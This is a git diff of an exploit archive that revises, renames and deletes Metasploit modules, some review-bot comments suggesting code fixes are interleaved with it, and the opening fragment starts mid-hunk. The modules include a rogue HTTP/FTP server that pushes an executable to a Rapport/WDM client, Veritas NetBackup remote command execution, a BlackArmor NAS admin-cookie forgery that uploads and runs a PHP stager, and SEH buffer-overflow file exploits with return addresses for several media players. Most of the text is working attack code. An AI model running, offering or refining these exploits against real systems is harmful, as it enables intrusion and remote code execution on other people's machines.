\x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" + - #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # FTP Paramaters - "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" + - "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" + - # No clue - "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|" + pwn3 = + "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + + # 
"|RB|#{incr+1}" + + # "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" + + #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + + # FTP Paramaters + "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" + + "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" + + # No clue + "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|" if target['Platform'] == 'win' - pwn = pwn1 + pwn3 + pwn = pwn1 + pwn3 elsif target['Platform'] == 'linux' - pwn = pwn1 + pwn2 + pwn3 + pwn = pwn1 + pwn2 + pwn3 end # Send the malicious request sock.put(mal) - + # Download some response data - resp = sock.get_once(-1, 10) - print_status("Received: " + resp) - + resp = sock.get_once(-1, 10) + print_status("Received: #{resp}") + + if not resp + print_error("No reply from the target, this may not be a vulnerable system") + return + end + print_status("Waiting on a connection to the HTTP service") begin Timeout.timeout(190) do - done = false - while (not done and session = wdmserver.accept) - req = session.recvfrom(2000)[0] - next if not req - next if req.empty? - print_status("HTTP Request: #{req.split("\n")[0].strip}") - - case req - when /V01/ - print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)") - res = pwn - when /V02/ - print_status("++ device sending V02 query...") - res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|" - done = true - - when /V55/ - print_status("++ device sending V55 query...") - res = pwn - when /POST/ # PUT is used for non encrypted requests. 
- print_status("++ device sending V55 query...") - res = pwn - done = true - else - print_status("+++ sending generic response...") - res = pwn + done = false + while (not done and session = wdmserver.accept) + req = session.recvfrom(2000)[0] + next if not req + next if req.empty? + print_status("HTTP Request: #{req.split("\n")[0].strip}") + + case req + when /V01/ + print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)") + res = pwn + when /V02/ + print_status("++ device sending V02 query...") + res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|" + done = true + + when /V55/ + print_status("++ device sending V55 query...") + res = pwn + when /POST/ # PUT is used for non encrypted requests. + print_status("++ device sending V55 query...") + res = pwn + done = true + else + print_status("+++ sending generic response...") + res = pwn + end + + print_status("Sending reply: #{res}") + session.put(res) + session.close end - - print_status("Sending reply: #{res}") - session.put(res) - session.close end - end - rescue ::TimeoutError + rescue ::Timeout::Error print_status("Timed out waiting on the HTTP request") wdmserver.close disconnect() stop_service() return end - + print_status("Waiting on the FTP request...") stime = Time.now.to_f while(not @exe_sent) break if (stime + 90 < Time.now.to_f) - select(nil, nil, nil, 0.25) + select(nil, nil, nil, 0.25) end - + if(not @exe_sent) print_status("No executable sent :(") end - + stop_service() wdmserver.close() - + handler disconnect end @@ -220,14 +233,14 @@ class Metasploit3 < Msf::Exploit::Remote c.put("425 Can't build data connection\r\n") return end - + c.put("150 Opening BINARY mode data connection for #{arg}\r\n") conn.put(@exe_file) c.put("226 Transfer complete.\r\n") conn.close @exe_sent = true end - + def on_client_command_size(c,arg) print_status("#{@state[c][:name]} FTP size request for #{arg}") c.put("213 #{@exe_file.length}\r\n") 
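Review bot: The new `if not resp` guard is placed after `print_status("Received: #{resp}")`, so a nil reply is first logged as an empty `Received:` line and only then reported as no reply; the check should precede the print, i.e. `resp = sock.get_once(-1, 10)` / `if not resp ... return end` / `print_status("Received: #{resp}")`. With `add_socket(wdmserver)` now registering the listener for automatic cleanup, the explicit `wdmserver.close` calls kept in both the timeout branch and the normal path become a second close; presumably the framework tolerates that, but confirming it would allow one of the two to go. The enclosing `exploit` method starts outside this hunk.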
diff --git a/platforms/multiple/remote/9941.rb b/platforms/multiple/remote/9941.rb
index c20f2ad4d..820f93a2a 100755
--- a/platforms/multiple/remote/9941.rb
+++ b/platforms/multiple/remote/9941.rb
@@ -1,9 +1,9 @@ ##
-# $Id$
+# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $ ## ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/
@@ -12,14 +12,15 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
- include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Tcp def initialize(info = {})
- super(update_info(info,
+ super(update_info(info, 'Name' => 'VERITAS NetBackup Remote Command Execution', 'Description' => %q{
- This module allows arbitrary command execution on an
+ This module allows arbitrary command execution on an ephemeral port opened by Veritas NetBackup, whilst an administrator is authenticated. The port is opened and allows direct console access as root or SYSTEM from
@@ -27,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE,
- 'Version' => '$Revision$',
+ 'Version' => '$Revision: 10617 $', 'References' => [ [ 'CVE', '2004-1389' ],
@@ -50,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'RequiredCmd' => 'generic perl telnet', } },
- 'Targets' =>
+ 'Targets' => [ ['Automatic', { }], ],
@@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(buf) res = sock.get(-1,3)
-
+ print_status("#{res}") handler
diff --git a/platforms/php/remote/36264.rb b/platforms/php/remote/36264.rb
index 7eb4bedf3..3ee4f5532 100755
--- a/platforms/php/remote/36264.rb
+++ b/platforms/php/remote/36264.rb
@@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -22,7 +22,6 @@ class Metasploit4 < Msf::Exploit::Remote without the need for authentication. The cookie can be easily decrypted using a known static encryption key and re-encrypted once the PHP object string has been modified. - This module has been tested on the STBN300 device. }, 'Author' => [ @@ -87,7 +86,7 @@ class Metasploit4 < Msf::Exploit::Remote headers = res.to_s # validate headers - if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28') + if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28') # and make sure that the body contains the title we'd expect if res.body.include?('Login to BlackArmor') return Exploit::CheckCode::Appears @@ -109,7 +108,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin - print_status("#{peer} - Establishing session with target ...") + print_status("Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', 
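Review bot: The corrected `headers.include?` calls in the `check` hunk at `@@ -87,7 +86,7 @@` still run against `headers = res.to_s`, which is the whole response including the body, so the `# validate headers` comment does not describe what is actually tested. Reading the two values from the parsed headers keeps the intent explicit, e.g. `if res.headers['X-Powered-By'] == 'PHP/5.2.13' && res.headers['Server'] == 'lighttpd/1.4.28'`, assuming `res` is a `Rex::Proto::Http::Response` as the neighbouring `res.body` usage suggests. The enclosing `check` method starts outside the hunk.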
@@ -121,21 +120,21 @@ class Metasploit4 < Msf::Exploit::Remote if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/ cookie_value = $1.strip else - fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") + fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") + fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") end # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting - print_status("#{peer} - Upgrading session to administrator ...") + print_status("Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) - vprint_status("#{peer} - PHP Object: #{php_object}") + vprint_status("PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) - vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") + vprint_status("Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) @@ -146,7 +145,7 @@ class Metasploit4 < Msf::Exploit::Remote config_time = ::Time.now.to_i begin - print_status("#{peer} - Extracting existing host configuration ...") + print_status("Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', 
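Review bot: Both `fail_with` calls in this hunk now use `Failure::Unreachable`, but the first one fires when the server did answer (a 200 without the expected cookie), for which `Failure::UnexpectedReply` is the matching code: `fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response from server.")`. The same pairing recurs in the hunks at `@@ -167,14 +166,14 @@` and `@@ -221,16 +220,16 @@` (`Stager upload failed (invalid result)`), which are likewise replies rather than connection failures. The enclosing `exploit` method starts outside the hunk.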
@@ -167,14 +166,14 @@ class Metasploit4 < Msf::Exploit::Remote end end else - fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") + fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") + fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") end - print_good("#{peer} - Host configuration extracted.") - vprint_status("#{peer} - Host configuration: #{host_config}") + print_good("Host configuration extracted.") + vprint_status("Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations @@ -191,7 +190,7 @@ class Metasploit4 < Msf::Exploit::Remote installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("") - vprint_status("#{peer} - Stager: #{stager}") + vprint_status("Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML @@ -203,7 +202,7 @@ class Metasploit4 < Msf::Exploit::Remote vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 
@@ -221,16 +220,16 @@ class Metasploit4 < Msf::Exploit::Remote ) unless res && res.code == 200 - fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).") + fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") + fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end - print_good("#{peer} - Stager uploaded.") + print_good("Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. - print_status("#{peer} - Executing stager ...") + print_status("Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "" 
@@ -250,20 +249,20 @@ class Metasploit4 < Msf::Exploit::Remote ) if res && res.code == 200 - print_good("#{peer} - Stager execution succeeded, payload ready for execution.") + print_good("Stager execution succeeded, payload ready for execution.") else - print_error("#{peer} - Stager execution failed (invalid result).") + print_error("Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - print_error("#{peer} - Stager execution failed (unable to establish connection).") + print_error("Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. - print_status("#{peer} - Restoring host config ...") + print_status("Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', @@ -281,7 +280,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 8 - invoke the installed payload, but only if all went to plan. unless errored - print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") + print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', @@ -325,7 +324,7 @@ class Metasploit4 < Msf::Exploit::Remote cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) - vprint_status("#{peer} - Cookie value: #{cookie_value}") + vprint_status("Cookie value: #{cookie_value}") cookie_value end diff --git a/platforms/windows/local/35935.py b/platforms/windows/dos/35935.py similarity index 100% rename from platforms/windows/local/35935.py rename to platforms/windows/dos/35935.py 
diff --git a/platforms/windows/local/36841.py b/platforms/windows/dos/36841.py
similarity index 100%
rename from platforms/windows/local/36841.py
rename to platforms/windows/dos/36841.py
diff --git a/platforms/windows/remote/9139.pl b/platforms/windows/dos/9139.pl
similarity index 100%
rename from platforms/windows/remote/9139.pl
rename to platforms/windows/dos/9139.pl
diff --git a/platforms/windows/local/9364.py b/platforms/windows/dos/9364.py
similarity index 100%
rename from platforms/windows/local/9364.py
rename to platforms/windows/dos/9364.py
diff --git a/platforms/windows/local/10363.rb b/platforms/windows/local/10363.rb
index 7fed5b42e..08a7af28e 100755
--- a/platforms/windows/local/10363.rb
+++ b/platforms/windows/local/10363.rb
@@ -1,3 +1,14 @@
+##
+# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote
@@ -5,27 +16,30 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh - + def initialize(info = {}) super(update_info(info, 'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. - When opening a malicious pls file with the Audio Workstation, - a remote attacker could overflow a buffer and execute - arbitrary code. + When opening a malicious pls file with the Audio Workstation, + a remote attacker could overflow a buffer and execute + arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'germaya_x', 'dookie', ], - 'Version' => '$Revision: 7724 $', + 'Version' => '$Revision: 10477 $', 'References' => [ + [ 'CVE', '2009-0476' ], + [ 'OSVDB', '55424' ], [ 'URL', 'http://www.exploit-db.com/exploits/10353' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + 'DisablePayloadHandler' => 'true', + }, 'Payload' => { 'Space' => 4100, @@ -35,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll ], @@ -43,10 +57,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 08 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'evil.pls']), - ], self.class) + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']), + ], self.class) end @@ -59,12 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote sploit << payload.encoded sploit << rand_text_alpha_upper(4652 - payload.encoded.length) - pls = sploit - print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(sploit) - file_create(pls) - end -end \ No newline at end of file +end diff --git a/platforms/windows/local/10373.rb b/platforms/windows/local/10373.rb index 58ca23b1f..d44becbce 100755 
--- a/platforms/windows/local/10373.rb
+++ b/platforms/windows/local/10373.rb
@@ -1,73 +1,80 @@ +## +# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh - include Msf::Exploit::Egghunter - + def initialize(info = {}) super(update_info(info, - 'Name' => 'Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)', + 'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)', 'Description' => %q{ - This module exploits a stack overflow in Xenorate 2.50 - By creating a specially crafted xpl playlist file, an an attacker may be able - to execute arbitrary code. + This module exploits a stack buffer overflow in Xenorate 2.50 + By creating a specially crafted xpl file, an an attacker may be able + to execute arbitrary code. 
}, 'License' => MSF_LICENSE, - 'Author' => [ 'loneferret, original by germaya_x' ], - 'Version' => '$Revision: $', + 'Author' => + [ + 'hack4love ', + 'germaya_x', + 'loneferret', + 'jduck' + ], + 'Version' => '$Revision: 10477 $', 'References' => [ + [ 'OSVDB', '57162' ], [ 'URL', 'http://www.exploit-db.com/exploits/10371' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + 'DisablePayloadHandler' => 'true', + }, 'Payload' => { 'Space' => 5100, 'BadChars' => "\x00", 'StackAdjustment' => -3500, - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, - 'DisableNops' => 'True', + 'DisableNops' => true, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll + [ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2 ], 'Privileged' => false, - 'DisclosureDate' => 'Dec 10 2009', + 'DisclosureDate' => 'Aug 19 2009', 'DefaultTarget' => 0)) register_options( [ - OptString.new('FILENAME', [ false, 'The file name.', 'evil.xpl']), + OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']), ], self.class) end def exploit - # Unleash the Egghunter! - eh_stub, eh_egg = generate_egghunter - sploit = rand_text_alpha_upper(88) - sploit << "\xEB\x06\x90\x90" - sploit << [target.ret].pack('V') - sploit << make_nops(20) - buffer << eh_stub - buffer << rand_text_alpha_upper(2000) - buffer << eh_egg * 2 + sploit << generate_seh_payload(target.ret) sploit << payload.encoded - - xpl = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") - - file_create(xpl) + file_create(sploit) end diff --git a/platforms/windows/local/10744.rb b/platforms/windows/local/10744.rb index 04e37894e..10e8400b5 100755 --- a/platforms/windows/local/10744.rb +++ b/platforms/windows/local/10744.rb 
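Review bot: The rewritten description keeps the doubled article in `an an attacker may be able`; the new line should read `By creating a specially crafted xpl file, an attacker may be able`. The same phrase survives in the new descriptions of 10744.rb (`@@ -11,31 +15,32 @@`) and 10748.rb (`@@ -15,27 +19,28 @@`). In all three the first sentence also still runs into `By creating` without a full stop after the product name.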
@@ -1,3 +1,7 @@ +## +# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -11,31 +15,32 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT - include Msf::Exploit::Remote::Seh + include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)', - 'Description' => %q{ - This module exploits a stack overflow in Media Jukebox 8.0.400 - By creating a specially crafted m3u or pls file, an an attacker may be able - to execute arbitrary code. + 'Description' => %q{ + This module exploits a stack buffer overflow in Media Jukebox 8.0.400 + By creating a specially crafted m3u or pls file, an an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Ron Henry - ', + 'Ron Henry ', 'dijital1', ], - 'Version' => '$Revision: 7828 $', + 'Version' => '$Revision: 11516 $', 'References' => [ - [ 'OSVDB', '' ], - [ 'URL', 'http://www.exploit-db.com' ], + [ 'OSVDB', '55924' ], + [ 'CVE', '2009-2650'] ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', + 'DisablePayloadHandler' => 'true', }, 'Payload' => { @@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll ], 'Privileged' => false, + 'DisclosureDate' => 'July 1 2009', 'DefaultTarget' => 0)) register_options( 
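Review bot: `'DisclosureDate' => 'July 1 2009'` in the hunk at `@@ -50,6 +55,7 @@` uses a different date form from every other DisclosureDate in this change (`'Feb 01 2002'`, `'Jul 10 2009'`, `'Dec 08 2009'`, `'Dec 25 2009'`), which all use an abbreviated month and a zero-padded day; for consistency it should be `'DisclosureDate' => 'Jul 01 2009',`. If the framework parses this field, the long month name may also fail to parse, which is worth confirming.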
@@ -60,15 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - - sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger - sploit << rand_text_alphanumeric(262) + sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger + sploit << rand_text_alphanumeric(262) sploit << generate_seh_payload(target.ret) sploit << payload.encoded print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) - end end diff --git a/platforms/windows/local/10748.rb b/platforms/windows/local/10748.rb index 33e37dd9a..3474c347d 100755 --- a/platforms/windows/local/10748.rb +++ b/platforms/windows/local/10748.rb @@ -1,3 +1,7 @@ +## +# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,27 +19,28 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit', - 'Description' => %q{ - This module exploits a stack overflow in Mini-Stream 3.0.1.1 - By creating a specially crafted pls file, an an attacker may be able - to execute arbitrary code. + 'Description' => %q{ + This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 + By creating a specially crafted pls file, an an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Corlan Security Team ', - 'Ron Henry - - EIP Offset fix', + 'CORELAN Security Team ', + 'Ron Henry ', # Return address update 'dijital1', ], - 'Version' => '$Revision: 7828 $', + 'Version' => '$Revision: 11516 $', 'References' => [ - [ 'OSVDB', '' ], + [ 'OSVDB', '61341' ], [ 'URL', 'http://www.exploit-db.com/exploits/10745' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', + 'DisablePayloadHandler' => 'true', }, 'Payload' => { 
@@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll ], 'Privileged' => false, + 'DisclosureDate' => 'Dec 25 2009', 'DefaultTarget' => 0)) register_options( @@ -60,16 +66,15 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - - sploit = rand_text_alphanumeric(17403) + sploit = rand_text_alphanumeric(17403) sploit << [target.ret].pack('V') sploit << "CAFE" * 8 sploit << payload.encoded print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) - print_status("Copy .pls to webserver and pass the URL to the application") - + print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application") end end + diff --git a/platforms/windows/local/16620.rb b/platforms/windows/local/16620.rb deleted file mode 100755 index 10e8400b5..000000000 --- a/platforms/windows/local/16620.rb +++ /dev/null 
@@ -1,78 +0,0 @@ -## -# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::FILEFORMAT - include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)', - 'Description' => %q{ - This module exploits a stack buffer overflow in Media Jukebox 8.0.400 - By creating a specially crafted m3u or pls file, an an attacker may be able - to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Ron Henry ', - 'dijital1', - ], - 'Version' => '$Revision: 11516 $', - 'References' => - [ - [ 'OSVDB', '55924' ], - [ 'CVE', '2009-2650'] - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 3000, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], # 0x02951457 pop, pop, ret dsp_mjMain.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll - ], - 'Privileged' => false, - 'DisclosureDate' => 'July 1 2009', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']), - ], self.class) - end - - - def exploit - sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger - sploit << rand_text_alphanumeric(262) - sploit << generate_seh_payload(target.ret) - sploit << payload.encoded - - print_status("Creating 
'#{datastore['FILENAME']}' file ...") - file_create(sploit) - end - -end diff --git a/platforms/windows/local/16650.rb b/platforms/windows/local/16650.rb deleted file mode 100755 index d44becbce..000000000 --- a/platforms/windows/local/16650.rb +++ /dev/null 
@@ -1,81 +0,0 @@ -## -# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::FILEFORMAT - include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)', - 'Description' => %q{ - This module exploits a stack buffer overflow in Xenorate 2.50 - By creating a specially crafted xpl file, an an attacker may be able - to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'hack4love ', - 'germaya_x', - 'loneferret', - 'jduck' - ], - 'Version' => '$Revision: 10477 $', - 'References' => - [ - [ 'OSVDB', '57162' ], - [ 'URL', 'http://www.exploit-db.com/exploits/10371' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 5100, - 'BadChars' => "\x00", - 'StackAdjustment' => -3500, - 'DisableNops' => true, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2 - ], - 'Privileged' => false, - 'DisclosureDate' => 'Aug 19 2009', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']), - ], self.class) - - end - - def exploit - - sploit = rand_text_alpha_upper(88) - sploit << generate_seh_payload(target.ret) - sploit << payload.encoded - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sploit) - - end - -end 
diff --git a/platforms/windows/local/16661.rb b/platforms/windows/local/16661.rb
deleted file mode 100755
index 08a7af28e..000000000
--- a/platforms/windows/local/16661.rb
+++ /dev/null
